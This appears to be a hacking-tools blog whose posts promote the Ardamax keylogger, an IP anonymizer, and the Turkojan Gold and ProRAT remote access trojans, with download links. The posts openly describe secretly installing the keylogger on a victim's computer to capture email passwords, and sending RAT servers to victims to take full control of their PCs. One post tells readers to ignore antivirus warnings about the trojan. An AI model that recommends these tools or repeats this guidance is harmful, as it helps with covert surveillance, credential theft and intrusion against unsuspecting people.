Tuesday 31 January 2017

Trying to purchase a new domain with .com.pk
touch with us for more update soon.
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seems to be very busy..

Friday 22 April 2016

ardamax kwylogger

Ardamax keylogger software which can be used to hack remote computer,Basically Keylogger is a software that is installed on a Victims computer without his knowing, this Keylogger software simply keeps on recording the Key strokes typed by the victim and sends them to your mailbox. No doubt, these keystrokes contain the victim’s Email passwords and All such important information.

Here is tutorial for setup

For Download
Download Here



IP anonymizer

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work . It also includes anonymous surfing wizard which guides you to the different parts of the software like online privacy etc.


Turkojan gold

Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but also you will also be able to control it whole. client contains various options for controlling  the victim computer in many ways. 

Note : Your antivirus will detect as a HACKTOOL as it is RAT, but don't worry, it is not infected. 




Ha**k computer Remotly

PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses a client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect the victim's PC in different ways. Just create the server and send it to the victim. 
